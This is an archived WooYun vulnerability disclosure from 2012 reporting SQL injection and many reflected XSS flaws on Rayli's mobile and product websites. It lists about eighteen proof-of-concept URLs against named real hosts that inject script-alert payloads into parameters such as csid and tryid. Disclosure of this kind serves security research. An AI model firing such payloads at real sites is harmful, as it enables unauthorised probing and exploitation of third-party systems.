当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015481

漏洞标题:手机瑞丽网sql注入 +xss若干

相关厂商:瑞丽网

漏洞作者: 黄小昏

提交时间:2012-12-01 17:15

修复时间:2013-01-15 17:16

公开时间:2013-01-15 17:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

瑞丽网的手机存在sql注入

详细说明:

http://58.68.226.230/article/search.php?ver=iphone&tag=%E6%90%AD%E9%85%8D

1.png


xss若干
http://hzp.rayli.com.cn/tryapply/?tryid='"><script>alert(4828051);</script><"
http://hzp.rayli.com.cn/products/show/33880?score[27]=&score[20]=&score[7]=&score[35]=&pf_ycall=&ptypecode=010402&pid=33880&bid=549&issubprice=0&csid='"><script>alert(6484834);</script><"
http://hzp.rayli.com.cn/products/show/36104?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=36104&bid=707&issubprice=0&csid='"><script>alert(0555687);</script><"
http://3g.rayli.com.cn/article/search.php?ver=iphone&tag='"><script>alert(3870586);</script><"
http://hzp.rayli.com.cn/products/show/32817?score[50]=&score[51]=&score[52]=&score[7]=&score[1]=&pf_ycall=&ptypecode=010602&pid=32817&bid=718&issubprice=0&csid='"><script>alert(8194777);</script><"
http://hzp.rayli.com.cn/products/show/37269?score[2]=&score[6]=&score[5]=&score[4]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010107&pid=37269&bid=671&issubprice=0&csid='"><script>alert(8709470);</script><"
http://hzp.rayli.com.cn/products/show/9155?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=9155&bid=694&issubprice=0&csid='"><script>alert(7228560);</script><"
http://hzp.rayli.com.cn/products/show/33629?score[38]=&score[36]=&score[37]=&score[7]=&pf_ycall=&ptypecode=010120&pid=33629&bid=788&issubprice=0&csid='"><script>alert(9867271);</script><"
http://hzp.rayli.com.cn/products/show/34713?score[6]=&score[4]=&score[2]=&score[5]=&score[1]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010108&pid=34713&bid=1216&issubprice=0&csid='"><script>alert(3928682);</script><"
http://hzp.rayli.com.cn/products/show/31930?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=31930&bid=836&issubprice=0&csid='"><script>alert(5182876);</script><"
http://hzp.rayli.com.cn/products/show/34968?score[4]=&score[5]=&score[6]=&score[2]=&score[3]=&score[1]=&score[7]=&pf_ycall=&ptypecode=010115&pid=34968&bid=1216&issubprice=0&csid='"><script>alert(8396796);</script><"
http://hzp.rayli.com.cn/products/show/34995?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=34995&bid=487&issubprice=0&csid='"><script>alert(4617969);</script><"
http://hzp.rayli.com.cn/products/show/33212?score[38]=&score[51]=&score[15]=&score[14]=&score[7]=&pf_ycall=&ptypecode=010118&pid=33212&bid=612&issubprice=0&csid='"><script>alert(0983381);</script><"
http://hzp.rayli.com.cn/products/show/34363?score[25]=&score[27]=&score[7]=&score[11]=&score[26]=&pf_ycall=&ptypecode=010501&pid=34363&bid=597&issubprice=0&csid='"><script>alert(0983381);</script><"
http://hzp.rayli.com.cn/products/show/33527?score[19]=&score[5]=&score[27]=&score[7]=&score[11]=&score[28]=&pf_ycall=&ptypecode=010503&pid=33527&bid=489&issubprice=0&csid='"><script>alert(0692564);</script><"
http://hzp.rayli.com.cn/products/show/33828?score[2]=&score[4]=&score[6]=&score[1]=&score[5]=&score[7]=&score[3]=&pf_ycall=&ptypecode=010104&pid=33828&bid=691&issubprice=0&csid='"><script>alert(4408438);</script><"
http://hzp.rayli.com.cn/products/show/14787?score[39]=&score[4]=&score[6]=&score[1]=&score[40]=&score[7]=&pf_ycall=&ptypecode=010112&pid=14787&bid=811&issubprice=0&csid='"><script>alert(6908941);</script><"
http://hzp.rayli.com.cn/tryapply/?tryid='"><script>alert(9033611);</script><"

漏洞证明:

同上,sql和xss没有过滤,

修复方案:

你们的大牛很多,应该懂得 过滤

版权声明:转载请注明来源 黄小昏@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝